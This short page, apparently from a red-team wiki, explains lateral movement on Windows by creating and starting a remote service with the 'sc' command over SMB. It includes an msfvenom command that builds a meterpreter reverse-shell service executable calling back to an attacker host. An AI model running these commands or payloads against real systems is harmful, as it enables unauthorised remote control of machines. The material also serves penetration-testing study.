Service Control (SC)
Administrator rights on the target machine are mandatory.
The Service Controller (sc) proves particularly valuable for attackers, enabling task scheduling via SMB.
sc \\host.domain create ExampleService binpath= âc:\windows\system32\calc.exeâ
sc \\host.domain start ExampleService
The caveat here is that the executable must specifically be a service binary. Service binaries differ in that they need to "register" with the Service Control Manager (SCM), and if not, they terminate execution. Hence, if a non-service binary is used for this purpose, it will come back as a brief agent/beacon for a moment and then terminate.
Directly creating an executable that runs as a service is possible:
In Cobalt Strike, navigate to Attacks > Packages > Windows Executable (S), and select the Service Binary output type.

Using msfvenom, specify the exe-service format:
msfvenom -p windows/meterpreter/reverse_tcp -f exe-service LHOST=<IP> LPORT=<PORT> -o service.exe
Last updated
Was this helpful?